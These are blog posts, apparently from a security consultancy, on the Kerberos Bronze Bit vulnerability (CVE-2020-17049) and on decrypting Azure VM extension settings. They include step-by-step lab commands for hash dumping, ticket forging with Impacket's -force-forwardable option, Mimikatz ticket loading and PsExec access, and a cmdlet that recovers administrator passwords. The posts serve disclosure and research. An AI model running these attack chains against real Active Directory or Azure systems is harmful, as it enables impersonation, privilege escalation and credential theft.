After confirming that Service1 is allowed to delegate authentication to Service2, the KDC decrypts the received service ticket using Service1’s long-term secret key and checks the Forwardable flag. If the service ticket’s Forwardable flag is set to 0, the KDC will perform additional checks and exchange will fail with an error. If the Forwardable flag is set to 1, the KDC will return a new service ticket which is valid for Service2 as the target user.

Kerberos Constrained Delegation Overview Complete

Spot the Problem

There you go! You now have all the information necessary to spot what it wrong in this authentication protocol. If you’d like, take a second to review the information covered so far and see if you can find the vulnerability. When you’re ready, continue down to the next section.

Flipping Bits for Fun and for Profit

Let’s take a closer at the TGS_REP data structure returned by the KDC after the S4U2self exchange.  Consider the scenario where Service1 is not “TrustedToAuthForDelegation” or the specified user is protected from delegation (because it is a member of the “Protected Users” group or it is configured with the “Account is sensitive and cannot be delegated” setting). Here’s how that TGS_REP could look:

S U Self Exchange Tgs Rep

Because of the protections in place, the Forwardable flag is not set (i.e. its value is 0). This means that the service ticket would be rejected if used as proof in the S4U2proxy exchange.

Look closely at where the Forwardable flag is located in the response. The service ticket’s Forwardable flag is encrypted with Service1’s long-term. The Forwardable flag is not in the signed PAC. Service1 is free to decrypt, set the Forwardable flag’s value to 1, and re-encrypt the service ticket. Because it’s not in the signed PAC, the KDC is unable to detect that the value has been tampered with.

Bit Flip Animation Cropped

Voila! We have converted a non-forwardable ticket into a forwardable ticket. This forwardable service ticket can be provided as proof in the S4U2proxy exchange, allowing us to delegate authentication to Service2, as any user of our choice.

Protections Bypassed

Recall the protections discussed earlier. By flipping the forwardable bit, we’re bypassing two of the three protections:

  1. We’ve bypassed the protection for TrustedToAuthForDelegation and the “Trust this computer for delegation to specified services only – Use Kerberos only” configuration. This protection is enforced by ensuring that any service ticket received in the S4U2self exchange is non-forwardable, unless the requesting service is TrustedToAuthForDelegation. By setting the forwardable flag ourselves, we’ve effectively removed this distinction and enabled the service to perform the protocol transition, as if the service were configured with the “Trust this computer for delegation to specified services only – Use any authentication protocol” option.
  2. We’ve also bypassed the protection for accounts which do not allow delegation. Again, this is enforced by ensuring that any service ticket received in the S4U2self exchange on behalf of a protected account is non-forwardable. By converting this to a forwardable service ticket, the service can now delegate the account’s authentication as if there was no such protection.

Microsoft's Patch

Microsoft has released multiple patches throughout November and December 2020 to fix this vulnerability. The various patches can be found in the MSRC Security Update Guide for CVE-2020-17049 and their rollout plan and advice can be found here.

Because the "Service for User and Constrained Delegation Protocol" (MS-SFU) is an open specification, we can get a good idea of how the fix was implemented. MS-SFU revision 19.0 published on November 23, 2020 now contains the underlined addition to section 3.2.5.2.2:

Service 1's KDC verifies both server ([MS-PAC] section 2.8.1) and KDC ([MS-PAC] section 2.8.2) signatures of the PAC. Because Service 1’s KDC is ingesting a service ticket rather than a TGT, it SHOULD also ensure the integrity of the service ticket by verifying the ticket  signature ([MS-PAC] section 2.8.3). If Service 2 is in another domain, then its KDC verifies only the KDC signature of the PAC.

The specification now references a "ticket signature" which should be verified by the KDC along with the existing PAC. Let's look at that referenced section of the MS-PAC specification. We can see that revision 20.0 was published on the same day and added Section 2.8.3. I think the following snippet of that section best captures the core change:

The ticket signature is used to detect tampering of tickets by parties other than the KDC. The ticket signature SHOULD be included in tickets that are not encrypted to the krbtgt account (including the change password service) or to a trust account. The KDC signature is a keyed hash [RFC4757] of the ticket being issued less the PAC itself.

The key takeaway for us is that the PAC now has an additional field which holds the "ticket signature." When the service ticket is produced during the S4U2self exchange, the KDC signs the ticket contents with its secret key and inserts the signature into the PAC. As discussed previously, the PAC itself is also doubly signed with the KDC’s secret key and the service’s key. Later when the KDC receives the service ticket during the S4U2proxy exchange, the KDC can validate all three signatures to confirm that the PAC and the service ticket have not been modified. If the service ticket is modified (for example, if the the forwardable bit has changed), the KDC will detect the change and reject the request with an error such as "KRB_AP_ERR_MODIFIED(Message stream modified)."

Final Thoughts

Thank you so much for joining me on this journey through Hades to get to know Kerberos. Armed with this background knowledge, I hope you continue onto my CVE-2020-17049: Kerberos Bronze Bit Attack - Practical Expliotation post. There I discuss how the attack is implemented and how it could be used. I hope to see you there!

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Theory [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-theory [to_ping] => [pinged] => [post_modified] => 2023-06-13 10:42:45 [post_modified_gmt] => 2023-06-13 15:42:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11799 [menu_order] => 443 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 11795 [post_author] => 52 [post_date] => 2020-12-08 07:00:20 [post_date_gmt] => 2020-12-08 07:00:20 [post_content] =>

With the release of Microsoft's patch to fix CVE-2020-17049, I’m excited to share details about this vulnerability and how it could be exploited. This post is only a very high-level overview, and I strongly encourage readers who are interested to check out my follow-up posts which provide much more depth:

From the attacker’s perspective, the exploit requires a few prerequisites:

  1. A foothold in the target environment to launch the attack.
  2. The password hash of a service account.
  3. That service account must be allowed to perform constrained delegation to another service.
    1. This could be classic constrained delegation (with either the “– Use Kerberos only” or the “- Use any authentication protocol” setting).
    2. This could also be resource-based constrained delegation.

With these prerequisites met, the attacker can authenticate to the second service as any user. This includes members of the Protected Users group and any other users explicitly configured as “sensitive and cannot be delegated.” The second service will accept and process the attacker’s requests as if they came from the impersonated user.

This attack uses the S4U2self and S4U2proxy protocols introduced by Microsoft as extensions to the Kerberos protocol used by Active Directory. The attack uses the S4U2self protocol to obtain a service ticket for a targeted user to the compromised service, using the service's password hash.

The attack then manipulates this service ticket by ensuring its forwardable flag is set (flipping the “Forwardable” bit to 1). The tampered service ticket is then used in the S4U2proxy protocol to obtain a service ticket for the targeted user to the targeted service. With this final service ticket in hand, the attacker can impersonate the targeted user, send requests to the targeted service, and the requests will be processed under the targeted user’s authority.

Exploit Overview Complete

This attack is made possible because the forwardable flag is only protected by encrypting the service ticket with the first service’s password hash. Having already obtained the hash, the attacker is free to decrypt the service ticket, flip the bit to set the forwardable flag, and then re-encrypt the ticket. Unlike the PAC, targeted in the MS14-068 attack, there is no signature in this portion of the ticket to detect tampering.

Bit Flip Animation Cropped

This exploit bypasses 2 existing protections for Kerberos delegation, and provides an opportunity for impersonation, lateral movement, and privilege escalation. Because this is accomplished by flipping a single bit, and in the spirit of the Golden Ticket and Silver Ticket attacks, I’ve dubbed this the Bronze Bit attack.

Rd Place Text

If you'd like try the exploit in your own environment, it has been implemented as addition to the Impacket framework with a pull request pending. Of course, this will have to be tested in a controlled environment with an unpatched domain controller. I recommend checking out the Practical Exploitation post for further details on how the exploit can be used.

Of course, any new research is built on the great work of many others. I’d like to thank the following individuals in particular for publishing their own research and for helping me with this finding:

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Overview [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-overview [to_ping] => [pinged] => [post_modified] => 2023-05-18 12:49:31 [post_modified_gmt] => 2023-05-18 17:49:31 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11795 [menu_order] => 442 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 11819 [post_author] => 52 [post_date] => 2020-12-08 07:00:09 [post_date_gmt] => 2020-12-08 07:00:09 [post_content] =>

This post reviews how the Kerberos Bronze Bit vulnerability (CVE-2020-17049) can be exploited in practice. I strongly suggest first reading the Bronze Bit Attack in Theory post to understand why and how this attacks works.

It is also worth noting that Microsoft published a patch for the vulnerability on November 10, 2020. The patch rollout will continue through February 9, 2021. The following attack scenarios assume the attacker is working in an environment where the Domain Controller does not have this patch applied.

The attacks enabled by the Bronze Bit vulnerability are an extension of other known attacks that arise from Kerberos Delegation. Elad Shamir and Will Schroeder have excellent articles explaining these scenarios and when they could be used. The Bronze Bit exploit bypasses two possible mitigations for the existing attack paths, increasing their effectiveness and versatility. An attacker can now perform the following:

  1. An attacker can impersonate users which are not allowed to be delegated. This includes members of the Protected Users group and any other users explicitly configured as “sensitive and cannot be delegated.”
  2. An attacker can launch the attack from a service which is not allowed to perform the authentication protocol transition. This means that if the service is configured without the “TrustedToAuthForDelegation” property (shown as “Trust this user for delegation to specified services only – Use Kerberos only” in the AD GUI), the attacker can use the exploit to obtain tickets as if the "TrustedToAuthForDelegation" property were set (shown as “Trust this user for delegation to specified services only – Use any authentication protocol” in the AD GUI).

Generic Attack Path

The general attack path for the exploit is the following:

  1. The attacker has a foothold in the AD environment.
  2. The attacker obtains the password hash for a service in the environment. We’ll refer to this service as “Service1.” There are many ways an attacker could obtain the necessary hash such as DC Sync attacks, Kerberoasting, or even creating a new machine account with SPN through Powermad.
  3. Service1 has a constrained delegation trust relationship to another service. We’ll refer to this as “Service2.” This trust relationship could be either of the following:
    1. Service1 is configured to perform constrained delegation to Service2. That is, Service2 is in Service1’s “AllowedToDelegateTo” list.
    2. Service2 is configured to accept resource-based constrained delegation from Service1. That is, Service1 is in Service2’s “PrincipalsAllowedToDelegateToAccount” list.
      1. If the attacker has write permissions (GenericAll, GenericWrite, WriteOwner, etc) for the Service2 object in AD, the attacker could add Service1 to Service2’s “PrincipalsAllowedToDelegateToAccount” list. This does not require domain admin privileges as described by Elad Shamir and Will Schroeder.
  4. The attacker uses the exploit to act as Service1 and obtain a Kerberos service ticket as a targeted user to Service2.
  5. The attacker impersonates the targeted user, presenting the service ticket to Service2. The attacker is now authenticated to Service2 as the targeted user, and can interact with Service2 under the targeted user’s authority.

Exploit Implementation

The Bronze Bit exploit has been developed as an extension of the Impacket framework from the good folks at SecureAuth. A pull request is currently pending to merge in the new exploit capabilities. There is a lot of great functionality available within Impacket, but we’re interested in the getST.py program. Let’s start by reviewing the program’s functionality without the exploit. We’ll jump into our attack path from above at Step #4. Let’s assume that we have obtained the hash for Service1, Service1 has a constrained delegation trust relationship to Service2, and we’re seeking to obtain access to Service2 as a target user.

The getST.py program can be used execute the S4U exchanges and obtain a service ticket as a specified user to a specified service. If Service1 is allowed to perform the protocol transition (i.e. configured with “TrustedToAuthForDelegation”) and the user is not protected from delegation, the execution would look like the following:

Typical S U Exchanges Complete

With the final service ticket, the attacker could impersonate the target user and interact with Service2 successfully. However, if Service1 is not allowed to perform protocol transition or the user is protected from delegation, the intermediate service ticket obtained in the S4U2self exchange will not be forwardable, and the S4U2proxy request will fail.

Rejected S U Exchange Complete

-force-forwardable Flag

The Bronze Bit exploit has been implemented as an extension to the getST.py program. I’ve added a new -force-forwardable flag which can be passed as a command line argument. When the -force-forwardable flag is present, the exploit is executed after the S4U2self exchange. The service ticket returned by the KDC in the S4U2self exchange is decrypted with Service1’s long-term key, its forwardable flag set, and then re-encrypted. This altered ticket is attached in the S4U2proxy exchange and the KDC will return a service ticket for Service2 as the target user.

S U With Exploit Complete

With the restrictions bypassed and service ticket in hand, the attacker is ready to impersonate the target user and interact with Service2 (Step #5 in the attack path).

Example Attack #1

Let’s see the attack in action.  In this scenario, we’ll see how the exploit allows us to bypass the “Trust this user for delegation to specified services only – Use Kerberos only” protection and impersonate a user who is protected from delegation. We’ll start with some initial environment setup.

Environment Configuration

Our test domain (test.local) has 3 servers running a version of Windows Server 2019 without the fix for the vulnerability. We’ll be launching our attack from our foothold as User1 on the Service1 server. We’ll be targeting User2, who has Administrative access to the Service2 server. And we’ll be interacting with the domain controller (DC) for all of Kerberos tickets.

On the DC, configure Service1 such that it is allowed to perform constrained delegation without protocol transition to Service2. This ensures that condition for Step #3 of the attack path is satisfied. If this configuration is set in the Active Directory GUI, it would look like the following:

Service Constrained Delegation To Service

While still on the DC, also update the User2 account so that it is protected from delegation. The account could be configured with the “Account is sensitive and cannot be delegated” property. The account could also be made a member of the “Protected Users” group. Either or both of these configuration changes are equivalent for this demonstration:

  • Configuring User2 with the “Account is sensitive and cannot be delegated” property:User Account Is Sensitive
  • Adding User2 to the “Protected Users” group:
    User In Protected Users

Executing the attack

Exit the domain controller, and log into the Service1 server as User1. This simulates having gained a foothold in the environment (Step #1 in the Attack Path). Startup a PowerShell session and confirm that User1 and Service1 cannot currently access Service2 under their own authorization.

Commands:

  • whoami
    whoami
  • ls \\service2.test.local\c$
    ls \\service2.test.local\c$
  • .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
    .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe

Execution:

Powershell Access Denied

We’ve confirmed that User1 can’t directly access Service2. We continue onto Step #2 of attack path: obtaining the hash for Service1. In this scenario, we’ll use Impacket’s secretsdump.py program to obtain the AES256-CTS-HMAC-SHA1-96 and LM:NTLM hash for the Service1 machine account.

Command:

  • python .\impacket\examples\secretsdump.py 'test/user1:<user1_password>@Service1.test.local'
    python .\impacket\examples\secretsdump.py 'test/user1:<user1_password>@Service1.test.local'

Execution:

Powershell Dump Hashes

After obtaining the necessary hashes, we’ll first attempt to execute the getST.py program without the -force-forwardable flag. This fails as expected. As discussed before, the S4U2self exchange still returns a service ticket to Service1 for User2, but that ticket’s Forwardable flag is not set because of the service’s delegation restrictions and user’s protection from delegation. This causes an error when the ticket is used as evidence in the S4U2proxy exchange.

Command:

  • .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1
    .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1

Execution:

Powershell S U Fail

The moment we’ve all be waiting for: let’s run the exploit! This is Step#4 of our attack path. We’ll repeat the previous command but this time including the -force-forwardable command line argument.

Command:

  • .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1 -force-forwardable
    .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1 -force-forwardable

Execution:

Powershell S U Exploit Success

Wow! Exciting stuff! Let’s focus in on a couple lines of output:

Service ticket from S4U2self flags: 00000000101000010000000000000000

Service ticket from S4U2self is not forwardable

Forcing the service ticket to be forwardable

Service ticket flags after modification: 01000000101000010000000000000000

Service ticket from S4U2self now is forwardable

With the inclusion of the -force-forwardable flag, the exploit is executed automatically and converts the service ticket received from the S4U2self exchange to a forwardable ticket. This is done by decrypting the ticket with Service1’s hash, changing the second bit in the flags value from 0 to 1, and re-encrypting the ticket. This forwardable ticket is sent in the S4U2proxy exchange, and a service ticket for Service2 as User2 is returned and written to disk at User2.ccache.

Next we’ll use Mimikatz to load the service ticket into our ticket cache for use. Once loaded, we’ll see that Mimikatz confirms that this is a valid ticket for User2 to the cifs service of Service2.

Command:

  • .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit
    .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit

Execution:

Powershell Mimikatz Load Ticket

With the service ticket added to our cache, we can now access Service2 as if we were User2. We have all of User2’s authority on Service2. We’ll use Mark Russinovich’s PSExec to obtain a PowerShell session on the Service2 server, and run some commands. This is our final Step #5 of the attack path.

Commands:

  • ls \\service2.test.local\c$
    ls \\service2.test.local\c$
  • .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
    .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
  • whoami
    whoami
  • hostname
    hostname

Execution:

Powershell Command Execution

And there we have it. We’ve flipped bits and abused Kerberos delegation to escalate our privileges and compromise another service by impersonating a protected user.

Example Attack #2

Let’s explore another attack path with different starting conditions. In this scenario, we’ll see how write permissions for the Service2 object in AD is all we need to successfully compromise Service2.

Environment Configuration

We’ll continue using the environment from the previous example, with a few modifications. The targeted User2 account can keep its configuration as a member of Protected Users or with the “Account is sensitive and cannot be delegated” property.

Begin by removing the Service1’s delegation permission. Connect to the DC and configure Service1 with “Do not trust this computer for delegation.”

Service No Delegation

Edit the Service2 Computer object, granting User1 write permissions. While we’re granting permissions to our foothold user directly, users would typically obtain write permissions to one or more AD objects through membership to privileged groups. The user does not necessarily need to be a domain admin.

User Write Permission Service

Executing the attack

Exit the domain controller, and log into the Service1 server as User1. Like before, this simulates having gained a foothold in the environment (Step #1 in the Attack Path). If you’ve continued from the first example, please be sure to clear the local Kerberos ticket cache. The most effective method for clearing the cache is simply rebooting Service1.

Unlike our previous example, this attack will not leverage any delegation trust relationship between Service1 and Service2. This trust relationship no longer exists after configuring Service1 with “Do not trust this computer for delegation.”  We’ll need to establish a new delegation relationship to Service2, this time as a completely new service.

To create a new service in the environment, we’ll use Kevin Robertson’s Powermad to create a new machine account. This does not require elevated privileges and is available to any user in the domain by default. We’ll name the machine account “AttackerService” and provide an arbitrary password: “AttackerServicePassword”

Commands:

  • Import-Module .Powermadpowermad.ps1
  • New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)

Execution:

Powershell Powermad

Since we chose the password for the new machine account, we can calculate the corresponding password hashes easily with Mimikatz. This will complete Step #2 of the attack path.

Commands:

  • .\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit
    .\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit

Execution:

Powershell Mimikatz Calc Hash

Let’s inspect our newly created machine account using the PowerShell Active Directory module. Since the module is not already available, we’ll install the corresponding feature, import the module, and then inspect our newly created machine account.

Commands:

  • Install-WindowsFeature RSAT-AD-PowerShell
  • Import-Module ActiveDirectory
  • Get-ADComputer AttackerService

Execution:

Powershell Inspect Machine Account

After confirming our machine account’s existence, we can establish the constrained delegation trust relationship between Service2 and the AttackerService. Because User1 (our controlled foothold account) has write permissions for the Service2 object, we can add AttackerService to Service2’s PrincipalsAllowedToDelegateToAccount list. This establishes resource-based constrained delegation on Service2, accepting constrained delegation from AttackerService. Once this step is complete, we’ve satisfied the condition for Step #3 of the attack path.

Commands:

  • Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
  • Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount

Execution:

Powershell Allow Rbac

We’re ready to continue onto Step #4 of the attack path and execute the exploit. We’ll use the same commands as in the previous example, but this time specifying AttackerService instead of Service1, and the hashes we calculated with Mimikatz. When we include the -force-forwardable flag in our command, we see the same results as we did in the previous example. The exploit is executed, the forwardable flag is set, and a service ticket to Service2 as User2 is written to disk at User2.ccache.

Commands:

  • python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardable
    python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardable

Execution:

Powershell S U Success

Now we can simply repeat our final commands from the previous example. We’ll prepare for Step #5 of the attack path by loading the service ticket into our local Kerberos ticket cache using Mimikatz. Then we’ll execute Step #5 by interacting with Service2, impersonating User2.

Commands:

  • .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
    .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
  • ls \\service2.test.local\c$
    ls \\service2.test.local\c$
  • .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
    .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
  • whoami
    whoami
  • hostname
    hostname

Execution:

Powershell Rce

And that’s all! With our starting foothold and write permissions for the Service2 AD object, we’ve compromised the service using the authority of a user who should have been protected from this type of delegation.

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Practical Exploitation [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-attack [to_ping] => [pinged] => [post_modified] => 2023-06-13 10:40:29 [post_modified_gmt] => 2023-06-13 15:40:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11819 [menu_order] => 445 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 11367 [post_author] => 52 [post_date] => 2020-03-30 07:00:07 [post_date_gmt] => 2020-03-30 07:00:07 [post_content] =>

TL;DR

If you're a local admin on an Azure VM, run the Get-AzureVMExtensionSettings script from MicroBurst to decrypt VM extension settings and potentially view sensitive parameters, storage account keys and local Administrator username and password.

Overview

The Azure infrastructure needs a mechanism to communicate with and control virtual machines. All Azure Marketplace images have the Azure Virtual Machine Agent (VM Agent) installed for this purpose.  Azure pre-packages some executable tasks as VM Extensions. The VM Agent downloads the extensions from the Azure infrastructure, executes them, and sends back the results. The settings and configuration for each extension are saved to disk, and any potentially-sensitive information within the those settings is encrypted.

The newly added Get-AzureVMExtensionSettings PowerShell cmdlet in NetSPI’s MicroBurst repository attempts to decrypt and report all available configuration information saved from previously executed extensions on a VM. Depending on how VM extensions have been utilized on the VM, this configuration may contain sensitive command parameters, storage account keys, or even the Administrator username and password.

Background

The Azure Fabric Controller acts as the middleware between the actual data center hardware and the various Windows Azure services. It is responsible for data center resource allocation/provisioning and the health/lifecycle management of the services.

Within Azure VMs, the VM Agent “manages interactions between an Azure VM and the Azure Fabric Controller. The VM agent is responsible for many functional aspects of deploying and managing Azure VMs, including running VM extensions.” The extension packages are downloaded from the Fabric Controller “through the privileged channel on private IP 168.63.129.16.”

Extensions’ .settings Files

When the extension packages are downloaded, their necessary files are stored on the VM’s file system at:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\

For example, the CustomScriptExtension’s files would be saved to:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\

This directory stores binaries, deployment scripts, status logs and more. Most importantly, it also stores the configuration information.

The exact information required is different for each extension, but this configuration is stored in the same format for all extensions. The configuration information is stored as a JSON object at the following path:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\RuntimeSettings\<#>.settings

For example, the CustomScriptExtension would store its settings file at the following path:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\RuntimeSettings\0.settings

Analyzing Settings for Sensitive Information

Each extension’s .settings file has the following structure:

{
  "runtimeSettings": [
    {
      "handlerSettings": {
        "protectedSettingsCertThumbprint": "<Thumbprint of Certificate Used to Encrypt the ProtectedSettings>",
        "protectedSettings": "Base64-Encoded Encrypted Settings",
        "publicSettings": { <Plaintext JSON Object for non-sensitive settings > }
      }
    }
  ]
}

The settings are specific to each extension, but we are interested in viewing the contents of the “protectedSettings” where potentially sensitive information is stored.

The Get-AzureVMPluginSettings cmdlet retrieves this information through the following steps:

  1. Find all .settings files on the VM for each extension.
  2. Apply the following steps to each settings file:
    1. If the .settings file has a valid “protectedSettingsCertThumbprint” value, find the corresponding certificate on the VM.
    2. If the certificate is found and its private key is accessible, decrypt the “protectedSettings” value.
    3. Output the decrypted “protectedSettings” value along with the rest of the information in the .settings file.

This allows us to easily review the plaintext values of the “protectedSettings” if the cmdlet can identify the corresponding certificate.

Secondary Settings Location

The .settings files nested deeply within C:\Packages\Plugins\ are useful, but not always complete. For example, the VMAccess extension (which resets Administrator credentials on the VM) truncates its .settings file as part of its execution. Additionally, sometimes the “protectedSettingsCertThumbprint” value references a certificate which has already been rotated and is unavailable on the VM. In these instances, we can’t recover the sensitive configuration information in the “protectedSettings” value.

However, there is a workaround! It was discovered that the JSON contents of these .settings file are also copied into an XML file within a ZIP file at the following path:

C:\WindowsAzure\CollectGuestLogsTemp\<GUID>.zip\Config\WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml

The contents of this XML file are kept up to date with the current encryption certificate, being re-encrypted as necessary. This means that the certificate should always be available on the VM and ready to decrypt the “protectedSettings” value. Additionally, the settings in the XML file are not redacted. This means that we can decrypt the settings of the VMAccess extension which include the Administrator username and password. The only downside of this XML file is that it appears to only contain information about the latest execution of each extension. This is fine for the VMAccess extension (since we’re most interested in the latest username and password) but less helpful for the RunCommand extension (where we may want to see past executions as well).

Attack Scenario Setup

Let’s demonstrate the cmdlet’s usage by first acting as an Azure Admin performing some actions, and creating the vulnerable environment, on a VM through extensions (running a command and resetting the Administrator credentials) and then acting as an attacker using Get-AzureVMExtensionSettings to retrieve the sensitive information.

Executing scripts through the RunCommand extension

Let’s pretend we’re an Azure Administrator tasked with joining a VM to a domain using existing Administrator credentials. There are several ways to accomplish this, but a tantalizing easy approach would be to perform this through a PowerShell script using the RunCommand feature. Although it’s against best practices, the Administrator credentials could be passed as parameters to the script. We may believe we’re protected because the script parameters are encrypted and stored in “protectedSettings.”

Using the Azure Cloud Shell, that command could look like the following:

PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name <VMName> -g <ResourceGroup > --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"

Once the command is issued, the VM Agent on target VM would pull the RunCommand extension from the Azure Fabric Controller. It would create a .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings

The settings are also copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file in the ZIP file described earlier. The specified PowerShell script would be executed by the VM agent and the VM would join the domain.

Resetting Administrator Credentials through the VMAccess extension

Let’s pretend that we also need to reset the Administrator credentials for the VM. This can be done graphically through the Portal or through PowerShell. In either case, this functionality utilizes the VMAccess extension to accomplish the task on the VM. As the admin running the command, we simply provide a new username and password for the VM Administrator account. The VMAccess extension will update the Administrator credentials on the VM and create an empty .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.Compute.VMAccessAgent\2.4.5\RuntimeSettings\0.settings

This empty file wouldn’t be useful for an attacker, but the non-redacted settings are copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file.

Running Get-AzureVMExtensionSettings as an attacker

Now let’s switch roles to the attacker. We’ll assume that we’ve obtained Administrator access to the VM (perhaps through having the Contributor role or compromising a privileged service) and that we can run PowerShell commands. To use the Get-AzureVMExtensionSettings cmdlet, we’ll first download and extract the latest copy of the MicroBurst repo.

PS C:\ > Invoke-WebRequest https://github.com/NetSPI/MicroBurst/archive/master.zip -OutFile C:\tmp\mb.zip
PS C:\> Expand-Archive C:\tmp\mb.zip -DestinationPath C:\tmp\

If we want the full MicroBurst functionality, we could import the top-level MicroBurst.psm1 module. In our case, we’ll only need to run the individual script so we’ll import it directly. Let’s import it, run it, and investigate the results.

PS C:\> Import-Module C:\tmp\MicroBurst-master\Misc\Get-AzureVMExtensionSettings.ps1
PS C:\ > Get-AzureVMExtensionSettings
FullFileName : C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings
ProtectedSettingsCertThumbprint : CFE7419...
ProtectedSettings : MIICUgYJKoZIhvc...
ProtectedSettingsDecrypted : {"parameters":[<span style="color: #ff0000;"><strong>{"name":"user","value":"admin"},{"name":"password","value":"secret-password"}</strong></span>]}
PublicSettings : {"script": …} 
…
FileName: C:\WindowsAzure\CollectGuestLogsTemp\491f155a-5a14-4fb2-8aad-08598b61f6c9.zip\Config\
                                  WireServerRoleExtensionsConfig_b4817d34-70d7-4e8f-bee6-6b8eea40aef7._MGITest.xml
ExtensionName: Microsoft.Compute.VMAccessAgent
ProtectedSettingsCertThumbprint : F67D19B6F4C1E1C1947AF9B4B08AFC9EAED9CBB2
ProtectedSettings: MIIB0AYJK…
ProtectedSettingsDecrypted: <strong><span style="color: #ff0000;">{"Password":"MySecretPassword!"}</span></strong>
PublicSettings: <strong><span style="color: #ff0000;">{"UserName":"MyAdministrator"}
</span></strong>

In the above output, we can see that Get-AzureVMExtensionSettings cmdlet returned decrypted parameters from the RunCommand extension’s 0.settings file and Administrator credentials from the VMAccess extension’s settings stored in the XML file within a ZIP.

With this information, we may be able to pivot further into the domain or Azure environment, spreading to other VMs, Storage Accounts, and more.

The cmdlet will return all available settings information from previously applied VM extensions, even if the script is unable to properly decrypt the protectedSettings field.

The cmdlet can also produce CSV results by piping the results into the standard Export-CSV cmdlet like so: Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv. The output results.csv will have one row for each extension processed.

Previous Research

In 2018, Guardicore published a blog and corresponding tool using this technique. Their exploit targeted a specific version of the VMAccess extension which can be used to reset Administrator credentials on a VM. As mentioned previously, recent updates to the VMAccess extension have mitigated this by clearing the contents of that .settings file after the extension has completed its task. The Get-AzureVMExtensionSettings provides a much broader scope by analyzing all extensions and including the secondary settings location which circumvents Microsoft’s mitigations.

Responsible Disclosure

The issues discussed in this post were reported to Microsoft Security Response Center (MSRC) on January 22, 2020 including steps and sample code to reproduce. The case numbers were VULN-015273 and VULN-015274. After understanding that the exploit requires Administrator privileges on the VM the cases were closed with the following comment:

Our team investigated the issue, and this does not meet the bar for servicing by MSRC, since this requires elevated privileges.
We have informed the team about this, but will not be tracking this. As such, we are closing this case.

 

Acknowledgements

A big thanks to Karl Fosaaen for the suggestion to dive into this functionality and support through the MSRC process.

